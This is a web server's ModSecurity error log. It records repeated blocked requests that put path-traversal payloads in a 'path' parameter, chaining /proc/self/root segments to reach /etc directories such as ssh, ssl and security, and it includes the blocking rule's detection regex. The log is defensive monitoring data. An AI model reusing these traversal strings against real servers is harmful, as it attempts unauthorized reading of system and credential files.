referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:30:15.351316 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:38870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2Z6QpVkWug9HeOt9SwQAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:30:45.347174 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:46514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2hf9ocpUE4ed4uDwSxAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:00.721077 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:38884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2lLysWC90G-1nBrBjuwAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:10.302997 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:43594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2nqTCbgAP5jq5TehKggAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:11.584834 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:40806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2n8_BxrYCr4hPDw8I0gAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:31:14.903879 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:40818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2oqQpVkWug9HeOt9S8AAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:31:15.325417 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:37752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2o6QpVkWug9HeOt9S8QAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:20.834889 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:48806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2qNSswJuvopo3lOh_cwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:38.296130 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:40830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2utSswJuvopo3lOh_kAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:31:39.652192 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:50432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2u7ysWC90G-1nBrBjywAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:41.042485 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:53302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2vY6lpbStxTqkSkuHhQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:49.119581 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:50446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2xY6lpbStxTqkSkuHjgAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:31:51.353071 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:49086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2xv9ocpUE4ed4uDwS5QAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:31:52.769756 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:49100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh2yP9ocpUE4ed4uDwS6QAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:31:58.724368 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.228.16:48414] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh2zkr9dMAiw-8KANNnQwAAARQ"]
[Mon Mar 16 18:32:07.359610 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:46208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh217ABkC4fWIHEf8EW7AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:32:09.875448 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:50918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh22Y6lpbStxTqkSkuHlAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:32:10.535017 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:49110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh22rABkC4fWIHEf8EW9AAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:32:21.753164 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:44840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh25VajLEzk2WiQ-10xKwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:33:07.151036 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:37620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3E6TCbgAP5jq5TehKzwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:33:13.809988 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:43528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3Gc_BxrYCr4hPDw8JNQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:33:31.168158 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:49600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh3K6QpVkWug9HeOt9TmAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
